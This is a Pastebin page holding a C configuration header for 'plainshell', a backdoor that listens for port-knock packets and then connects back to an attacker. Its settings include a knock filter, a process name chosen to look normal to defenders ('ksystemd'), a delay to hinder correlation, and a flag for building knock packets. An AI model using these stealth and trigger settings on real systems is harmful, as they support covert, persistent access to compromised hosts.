Advertisement
FlyFar

config.h

Jan 20th, 2024
528
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.16 KB | Cybersecurity | 0 0
  1. /*
  2.  * config.h
  3.  * Config for plainshell
  4.  * By J. Stuart McMurray
  5.  * Created 20160319
  6.  * Last Modified 20160319
  7.  */
  8.  
  9. #ifndef HAVE_CONFIG_H   /* Don't touch this */
  10. #define HAVE_CONFIG_H 1 /* Or this */
  11.  
  12. /* Device on which to listen for knock packets.  On linux, this can be "any"
  13.  * to listen on all interfaces. */
  14. #define DEVICE "lo0"
  15.  
  16. /* Only packets matching this filter will be used.  This should be set as
  17.  * restrictive as possible to avoid unintended packets being used. */
  18. #define FILTER "udp and dst port 53 and src port 31337"
  19.  
  20. /* Name for the shell in the process list.  This should look normal to a
  21.  * defender. */
  22. #define SHNAME "ksystemd"
  23.  
  24. /* Time to wait between getting a knock packet and connecting back to the
  25.  * attacker.  This may help make correlation a little harder, as well as
  26.  * make it easier to have a one-line knock-then-listen command. */
  27. #define WAITTM 2
  28.  
  29. /* Flag on the command line to tell Plainshell to make a knock packet body, and
  30.  * not be a backdoor.  This can be changed to avoid clashing with whatever is
  31.  * used on the infected host. */
  32. #define KNOCKFLAG "--k"
  33.  
  34. #endif /* HAVE_CONFIG_H */ /* Don't touch this. */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement